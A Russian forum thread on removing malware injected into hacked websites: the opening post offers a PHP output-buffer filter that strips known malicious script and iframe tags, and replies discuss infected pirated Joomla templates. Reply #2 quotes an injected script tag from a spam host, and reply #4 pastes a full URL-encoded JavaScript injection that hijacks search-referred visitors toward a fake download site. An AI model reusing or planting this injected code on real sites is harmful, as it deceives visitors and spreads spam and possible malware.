О том, как правильно удалить вредоносные коды на сайте

[Удален]

3 января 2011, 21:17

1429

Наверно большинство из Вас видели сообщения от владельцев сайтов, которые жалуются на то, что на их сайты отображаются JavaScript-скрипты, скрытые фреймы/ссылки и другие вредоносные коды которые появились на сайте после взлома сервера, установка дополнительных скриптов или новых шаблонов.

Как правило, большинство злоумышленников стараются „спрятать” вредоносные коды в PHP-файлы, используя разные функции и методы, чтобы владельцы сайтов не смогли их найти. Именно по этой причине во многих случаев не получается найти код „стандартным способом” (поиск определённой строки во всех файлах) или получить/использовать универсальный совет/метод для устранения этой неприятной проблемы.

Но, несмотря на этого, в данном посте я попробую рассказать о простом методе с помощью которого можно запретить отображения вредоносных кодов теоретически на любом сайте, тем самым позволяя посетителям сайта посмотреть ресурс не подозревая о проблемах, а Вам — найти и удалить ненужные коды.

Если Вам интересно почему я предлагаю сперва „скрыть” эти коды, а не сразу приступить к поиску — хочу напомнить что для того чтобы найти и удалить их, Вам может потребоваться от нескольких минут до нескольких часов — а за это время Вы можете потерять своих клиентов, посетителей, доверие поисковых систем и многое другое.

И так, план действий такой:

Открыть индексный файл Вашего сайта (например index.php) и вначале добавить следующий код:

# /begin

ob_start();

$malware_html_code = '<script src="//site.ru/exploit.js"></script>'; 

# begin/

$malware_html_code

|

$malware_html_code = '<script src="//site.ru/func.js"></script>|<iframe src="//site.ru/exploit.php"></iframe>|<script src="//site.ru/exploit.js"></script>';

?>

# end/

$html = ob_get_contents();

ob_end_clean();

if ( function_exists( 'ob_gzhandler' ) )

{

	ob_start ( 'ob_gzhandler' ); 

}

echo preg_replace( "#({$malware_html_code})#i", '<!--/ malware code /-->', $html );

# /end

Открывайте сайт и посмотрите исходный код страницы: если вместо вредоносного кода отображается , значит, теперь Вы спокойно можете искать вредоносный код в PHP-файлов или попросить о помощи. В противном случае — возможно, Вы где-то ошиблись или это особый случай о котором я бы хотел узнать.
После того как нашли и удалили вредоносный код, удалите строки кода из индексного файла Вашего сайта.

Вот и всё. Надеюсь, что Вам никогда не придётся воспользоваться моим советом и то, что у Вас всё будет хорошо. А если заметили какие-либо ошибки или есть идеи — пожалуйста, сообщите об этом.

14

work.css.html

4 января 2011, 15:18

#1

Все мы используем шаблоны популярных CMS систем от известных производителей. Как правило шаблоны варезные, поэтому в них иногда встроен вредоносный код, о котором говорил автор w0den.

Расскажу о Jooml'e - воображение умельцев не знает границ. Как всегда выкачал шаблон (грешу - что ж делать) почистил темку, проверил java - всё ок, сделал сайт, прошло пару месяцев - закинул в сапу и опля, на тех страницах, где выбран режим отображения Категория-Список категории (Джумловоды поймут) висит ссылочка, неприметная такая.

Сразу скажу - копаться в скриптах мне было лень, поэтому я просто выкачал джумлу более свежей версии и обновил все файлы по фтп. Проблема решена, ну а если вам хочется покопаться, то милости прошу в componets/com_content :-)

Плати только за реально используемые ресурсы хостинга (http://bit.ly/yDYyO6) Принимаю заказы на вёрстку в ЛС. XHTML, Joomla 1.5.

Google о дополнительном контенте Новый браузер от Яндекса Нeсколько очевидных причин проблем

74

starosta009

5 января 2011, 20:20

#2

а мне сегодня забросили на сайт такой скрипт <script language="JavaScript" charset="windows-1251" rel="nofollow" src="http://allbestporn.org/js/if.php?id=2"></script>. посмотрел по ссылке allbestporn.org - там написано: Выкупаем ру-ифрейм.

Цена 15-25 руб/тыс.По вопросам сотрудничества писать в ICQ:6254377

Если видишь Бургер Кинг Оптимизация плавающих фреймов для Google рекомендует использовать nofollow

14

work.css.html

27 января 2011, 18:00

#3

а как скрипт оказался на сайте? cms какая? может не обновляли давно, вот кто-то и воспользовался дыркой.

[Удален]

28 января 2011, 08:45

#4

w0den,

Сделал все как Вы описывали но нечего не вышло

вот код

document.write(unescape("%3Cscript%20type%3D%22text/javascript%22%3E%0D%0A%0D%0Afunction%20getrandom%28min_random%2C%20max_random%29%20%7B%0D%0A%20%20%20%20var%20range%20%3D%20max_random%20-%20min_random%20+%201%3B%0D%0A%20%20%20%20return%20Math.floor%28Math.random%28%29*range%29%20+%20min_random%3B%0D%0A%7D%0D%0A%0D%0ABCB%20%3D%20%7B%7D%3B%0D%0ABCB.r_tds%20%3D%20false%3B%0D%0ABCB.f_tds%20%3D%20false%3B%0D%0ABCB.a_s%20%3D%20false%3B%0D%0ABCB.ses%20%3D%20%5B%0D%0A%09%5B/google%5C./i%2C%20/%28%5C%3F%7C%26%29q%3D%28.*%3F%29%28%26%7C%24%29/i%2C%202%5D%2C%0D%0A%09%5B/search%5C.yahoo%5C./i%2C%20/%28%5C%3F%7C%26%29p%3D%28.*%3F%29%28%26%7C%24%29/i%2C%202%5D%2C%0D%0A%09%5B/bing%5C.com/i%2C%20/%28%5C%3F%7C%26%29q%3D%28.*%3F%29%28%26%7C%24%29/i%2C%202%5D%2C%0D%0A%09%5B/search%5C.aol%5C./i%2C%20/%28%5C%3F%7C%26%29q%3D%28.*%3F%29%28%26%7C%24%29/i%2C%202%5D%2C%0D%0A%09%5B/ask%5C.com/i%2C%20/%28%5C%3F%7C%26%29q%3D%28.*%3F%29%28%26%7C%24%29/i%2C%202%5D%2C%0D%0A%09%5B/altavista%5C./i%2C%20/%28%5C%3F%7C%26%29q%3D%28.*%3F%29%28%26%7C%24%29/i%2C%202%5D%2C%0D%0A%09%5B/search%5C.lycos%5C./i%2C%20/%28%5C%3F%7C%26%29query%3D%28.*%3F%29%28%26%7C%24%29/i%2C%202%5D%2C%0D%0A%09%5B/alltheweb%5C./i%2C%20/%28%5C%3F%7C%26%29q%3D%28.*%3F%29%28%26%7C%24%29/i%2C%202%5D%2C%0D%0A%09%5B/yandex%5C./i%2C%20/%28%5C%3F%7C%26%29text%3D%28.*%3F%29%28%26%7C%24%29/i%2C%202%5D%2C%0D%0A%09%5B/%28nova%5C.%7Csearch%5C.%29%3Frambler%5C./i%2C%20/%28%5C%3F%7C%26%29query%3D%28.*%3F%29%28%26%7C%24%29/i%2C%202%5D%2C%0D%0A%09%5B/gogo%5C./i%2C%20/%28%5C%3F%7C%26%29q%3D%28.*%3F%29%28%26%7C%24%29/i%2C%202%5D%2C%0D%0A%09%5B/go%5C.mail%5C./i%2C%20/%28%5C%3F%7C%26%29q%3D%28.*%3F%29%28%26%7C%24%29/i%2C%202%5D%2C%0D%0A%09%5B/nigma%5C./i%2C%20/%28%5C%3F%7C%26%29s%3D%28.*%3F%29%28%26%7C%24%29/i%2C%202%5D%0D%0A%5D%3B%0D%0ABCB.BCB%20%3D%20function%28ref%29%20%7B%0D%0A%09var%20q%3Dnull%3B%0D%0A%0D%0A%09for%28var%20i%3D0%3B%20i%3CBCB.ses.length%3B%20i++%29%20%7B%0D%0A%09%09var%20se%20%3D%20BCB.ses%5Bi%5D%3B%0D%0A%09%09if%20%28ref.match%28se%5B0%5D%29%29%20%7B%0D%0A%09%09%09q%20%3D%20ref.match%28se%5B1%5D%29%3B%0D%0A%09%09%09if%20%28q%29%20q%20%3D%20q%5Bse%5B2%5D%5D%3B%0D%0A%09%09%09break%3B%0D%0A%09%09%7D%0D%0A%09%7D%0D%0A%0D%0Avar%20referer%3D%22Y%22%3B%0D%0Aif%20%28referer%3D%3D%22N%22%29%20%7B%0D%0Aq%3Ddocument.title%3B%0D%0A%0D%0A%7D%0D%0A%0D%0A%09if%20%28q%29%20%7B%0D%0A%0D%0A%09%09q%3Ddocument.title%3B%0D%0A%09%09var%20q%20%3D%20decodeURIComponent%28q%29.replace%28/%20%BB%20Джуми.ру%3A%20Качай%20Бесплатно/g%2C%20%27%20%27%29%3B%0D%0A%0D%0A%0D%0Avar%20c_url%3D%27http%3A//rapidasshared.tk/%3Fwkey%3D68905%26query%3D%27+%28encodeURIComponent%28q%29%29%3B%0D%0A%0D%0Adocument.write%28%27%3Cstyle%3E.module-one-search%20img%20%7Bdisplay%3Ablock%3B%7D.module-one-search%20%7Bheight%3A112px%3Bmargin%3A6px%3Bfont%3Abold%2016px%20Arial%3Bbackground%3A%23fefefe%20url%28http%3A//img291.imageshack.us/img291/3307/blbg.gif%29%20repeat-y%20100%25%200%3Bborder%3A1px%20solid%20%23fefefe%3Bborder%3A1px%20solid%20%23ccc%3B%7D.module-one-search%20a%20%7Bcolor%3A%23007ecb%3B%7D.module-one-search%20span%20%7Bdisplay%3Ablock%3Bcolor%3A%23464646%3Bfont%3A12px%20Arial%3Btext-transform%3Auppercase%3B%7D.module-one-search%20.module-bg%20%7Bheight%3A72px%3Bpadding%3A40px%20100px%200%20131px%3Bbackground%3Aurl%28http%3A//img19.imageshack.us/img19/9311/blbgl.gif%29%20no-repeat%2014px%2016px%3B%7D%3C/style%3E%3Cdiv%20class%3D%22module-one-search%22%3E%3Cdiv%20class%3D%22module-bg%22%3EСкачать%20%3Ca%20href%3D%22%27+c_url+%27%22%20target%3D%22_blank%22%3E%3Cb%3E%27+q+%27%3C/b%3E%3C/a%3E%20прямая%20ссылка%3C/div%3E%3C/div%3E%27%29%3B//e%0D%0A%09%7D%0D%0A%7D%3B%0D%0ABCB.BCB%28document.referrer%29%3B%0D%0A%3C/script%3E"));

В 2023 году 36,9% всех DDoS-атак пришлось на сферу финансов

Что делать, чтобы попасть в ответы Google Bard